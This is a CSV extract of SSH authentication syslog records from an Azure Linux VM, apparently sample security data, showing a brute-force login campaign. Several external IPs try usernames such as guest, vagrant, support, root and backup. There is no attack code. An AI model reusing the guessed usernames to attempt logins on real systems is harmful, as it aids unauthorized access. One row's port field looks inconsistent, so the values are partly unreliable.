+4532,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:35:44,UbuntuDevEnv,2019-06-26 14:35:44,auth,UbuntuDevEnv,info,Invalid user pulse from 220.134.138.111 port 42876,10538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pulse,220.134.138.1,42876,,
+4533,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:35:44,UbuntuDevEnv,2019-06-26 14:35:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111,10538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,220.134.138.1,,0,
+4534,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:35:44,UbuntuDevEnv,2019-06-26 14:35:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,10538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4535,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:35:47,UbuntuDevEnv,2019-06-26 14:35:46,auth,UbuntuDevEnv,info,Failed password for invalid user pulse from 220.134.138.111 port 42876 ssh2,10538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pulse,220.134.138.1,42876,,
+4536,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:35:47,UbuntuDevEnv,2019-06-26 14:35:46,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 42876:11: Bye Bye [preauth],10538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,42876,,
+4537,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:35:47,UbuntuDevEnv,2019-06-26 14:35:46,auth,UbuntuDevEnv,info,Disconnected from invalid user pulse 220.134.138.111 port 42876 [preauth],10538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pulse,220.134.138.1,42876,,
+4538,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:35:50,UbuntuDevEnv,2019-06-26 14:35:50,auth,UbuntuDevEnv,info,Invalid user guest from 196.46.36.144 port 58745,10561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,196.46.36.1,58745,,
+4539,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:35:50,UbuntuDevEnv,2019-06-26 14:35:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144,10561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.46.36.1,,0,
+4540,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:35:50,UbuntuDevEnv,2019-06-26 14:35:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,10561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4541,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:35:53,UbuntuDevEnv,2019-06-26 14:35:52,auth,UbuntuDevEnv,info,Failed password for invalid user guest from 196.46.36.144 port 58745 ssh2,10561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,196.46.36.1,58745,,
+4542,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:35:53,UbuntuDevEnv,2019-06-26 14:35:52,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 58745:11: Bye Bye [preauth],10561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,58745,,
+4543,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:35:53,UbuntuDevEnv,2019-06-26 14:35:52,auth,UbuntuDevEnv,info,Disconnected from invalid user guest 196.46.36.144 port 58745 [preauth],10561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,196.46.36.1,58745,,
+4544,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:36:23,UbuntuDevEnv,2019-06-26 14:36:23,auth,UbuntuDevEnv,info,Invalid user cecile from 68.183.50.149 port 33946,10692,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cecile,68.183.50.1,33946,,
+4545,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:36:23,UbuntuDevEnv,2019-06-26 14:36:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,10692,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4546,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:36:23,UbuntuDevEnv,2019-06-26 14:36:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,10692,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+4547,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:36:25,UbuntuDevEnv,2019-06-26 14:36:24,auth,UbuntuDevEnv,info,Invalid user opsview from 164.132.192.219 port 52443,10698,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,opsview,164.132.192.2,52443,,
+4548,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:36:25,UbuntuDevEnv,2019-06-26 14:36:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,10698,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4549,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:36:25,UbuntuDevEnv,2019-06-26 14:36:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219,10698,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,164.132.192.2,,0,
+4550,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:36:25,UbuntuDevEnv,2019-06-26 14:36:24,auth,UbuntuDevEnv,info,Failed password for invalid user cecile from 68.183.50.149 port 33946 ssh2,10692,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cecile,68.183.50.1,33946,,
+4551,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:36:25,UbuntuDevEnv,2019-06-26 14:36:24,auth,UbuntuDevEnv,info,Disconnected from invalid user cecile 68.183.50.149 port 33946 [preauth],10692,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cecile,68.183.50.1,33946,,
+4552,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:36:25,UbuntuDevEnv,2019-06-26 14:36:24,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 33946:11: Bye Bye [preauth],10692,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,33946,,
+4553,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:36:27,UbuntuDevEnv,2019-06-26 14:36:26,auth,UbuntuDevEnv,info,Failed password for invalid user opsview from 164.132.192.219 port 52443 ssh2,10698,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,opsview,164.132.192.2,52443,,
+4554,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:36:27,UbuntuDevEnv,2019-06-26 14:36:26,auth,UbuntuDevEnv,info,Disconnected from invalid user opsview 164.132.192.219 port 52443 [preauth],10698,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,opsview,164.132.192.2,52443,,
+4555,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:36:27,UbuntuDevEnv,2019-06-26 14:36:26,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 52443:11: Bye Bye [preauth],10698,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,52443,,
+4556,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:37:28,UbuntuDevEnv,2019-06-26 14:37:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111  user=root,10916,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,220.134.138.1,,0,
+4557,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:37:29,UbuntuDevEnv,2019-06-26 14:37:29,auth,UbuntuDevEnv,info,Failed password for root from 220.134.138.111 port 59962 ssh2,10916,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,59962,,
+4558,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:37:29,UbuntuDevEnv,2019-06-26 14:37:29,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 220.134.138.111 port 59962 [preauth],10916,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,220.134.138.1,59962,,
+4559,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:37:29,UbuntuDevEnv,2019-06-26 14:37:29,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 59962:11: Bye Bye [preauth],10916,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,59962,,
+4560,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:37:49,UbuntuDevEnv,2019-06-26 14:37:49,auth,UbuntuDevEnv,info,Invalid user vagrant from 68.183.50.149 port 50898,10995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vagrant,68.183.50.1,50898,,
+4561,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:37:49,UbuntuDevEnv,2019-06-26 14:37:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,10995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4562,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:37:49,UbuntuDevEnv,2019-06-26 14:37:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,10995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+4563,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:37:51,UbuntuDevEnv,2019-06-26 14:37:51,auth,UbuntuDevEnv,info,Failed password for invalid user vagrant from 68.183.50.149 port 50898 ssh2,10995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vagrant,68.183.50.1,50898,,
+4564,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:37:51,UbuntuDevEnv,2019-06-26 14:37:51,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 50898:11: Bye Bye [preauth],10995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,50898,,
+4565,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:37:51,UbuntuDevEnv,2019-06-26 14:37:51,auth,UbuntuDevEnv,info,Disconnected from invalid user vagrant 68.183.50.149 port 50898 [preauth],10995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vagrant,68.183.50.1,50898,,
+4566,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:37:52,UbuntuDevEnv,2019-06-26 14:37:51,auth,UbuntuDevEnv,info,Invalid user jenny from 164.132.192.219 port 32768,11007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenny,164.132.192.2,32768,,
+4567,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:37:52,UbuntuDevEnv,2019-06-26 14:37:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,11007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4568,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:37:52,UbuntuDevEnv,2019-06-26 14:37:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219,11007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,164.132.192.2,,0,
+4569,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:37:53,UbuntuDevEnv,2019-06-26 14:37:53,auth,UbuntuDevEnv,info,Failed password for invalid user jenny from 164.132.192.219 port 32768 ssh2,11007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenny,164.132.192.2,32768,,
+4570,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:37:53,UbuntuDevEnv,2019-06-26 14:37:53,auth,UbuntuDevEnv,info,Disconnected from invalid user jenny 164.132.192.219 port 32768 [preauth],11007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenny,164.132.192.2,32768,,
+4571,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:37:53,UbuntuDevEnv,2019-06-26 14:37:53,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 32768:11: Bye Bye [preauth],11007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,32768,,
+4572,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:39:13,UbuntuDevEnv,2019-06-26 14:39:13,auth,UbuntuDevEnv,info,Invalid user support from 220.134.138.111 port 48824,11295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,220.134.138.1,48824,,
+4573,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:39:13,UbuntuDevEnv,2019-06-26 14:39:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111,11295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,220.134.138.1,,0,
+4574,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:39:13,UbuntuDevEnv,2019-06-26 14:39:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,11295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4575,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:39:16,UbuntuDevEnv,2019-06-26 14:39:15,auth,UbuntuDevEnv,info,Failed password for invalid user support from 220.134.138.111 port 48824 ssh2,11295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,220.134.138.1,48824,,
+4576,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:39:16,UbuntuDevEnv,2019-06-26 14:39:15,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 48824:11: Bye Bye [preauth],11295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,48824,,
+4577,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:39:16,UbuntuDevEnv,2019-06-26 14:39:15,auth,UbuntuDevEnv,info,Disconnected from invalid user support 220.134.138.111 port 48824 [preauth],11295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,support,220.134.138.1,220,,
+4578,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:39:18,UbuntuDevEnv,2019-06-26 14:39:17,auth,UbuntuDevEnv,info,Invalid user rong from 164.132.192.219 port 41331,11318,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rong,164.132.192.2,41331,,
+4579,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:39:18,UbuntuDevEnv,2019-06-26 14:39:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219,11318,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,164.132.192.2,,0,
+4580,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:39:18,UbuntuDevEnv,2019-06-26 14:39:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,11318,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4581,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:39:18,UbuntuDevEnv,2019-06-26 14:39:18,auth,UbuntuDevEnv,info,Invalid user alex from 68.183.50.149 port 39618,11320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,alex,68.183.50.1,39618,,
+4582,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:39:18,UbuntuDevEnv,2019-06-26 14:39:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,11320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+4583,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:39:18,UbuntuDevEnv,2019-06-26 14:39:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,11320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4584,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:39:19,UbuntuDevEnv,2019-06-26 14:39:19,auth,UbuntuDevEnv,info,Failed password for invalid user rong from 164.132.192.219 port 41331 ssh2,11318,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rong,164.132.192.2,41331,,
+4585,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:39:19,UbuntuDevEnv,2019-06-26 14:39:19,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 41331:11: Bye Bye [preauth],11318,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,41331,,
+4586,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:39:19,UbuntuDevEnv,2019-06-26 14:39:19,auth,UbuntuDevEnv,info,Disconnected from invalid user rong 164.132.192.219 port 41331 [preauth],11318,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rong,164.132.192.2,41331,,
+4587,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:39:20,UbuntuDevEnv,2019-06-26 14:39:20,auth,UbuntuDevEnv,info,Failed password for invalid user alex from 68.183.50.149 port 39618 ssh2,11320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,alex,68.183.50.1,39618,,
+4588,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:39:20,UbuntuDevEnv,2019-06-26 14:39:20,auth,UbuntuDevEnv,info,Disconnected from invalid user alex 68.183.50.149 port 39618 [preauth],11320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,alex,68.183.50.1,39618,,
+4589,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:39:20,UbuntuDevEnv,2019-06-26 14:39:20,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 39618:11: Bye Bye [preauth],11320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,39618,,
+4590,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:40:17,UbuntuDevEnv,2019-06-26 14:40:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170  user=backup,11531,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,backup,47.254.147.1,,0,
+4591,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:40:19,UbuntuDevEnv,2019-06-26 14:40:18,auth,UbuntuDevEnv,info,Failed password for backup from 47.254.147.170 port 53454 ssh2,11531,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,53454,,
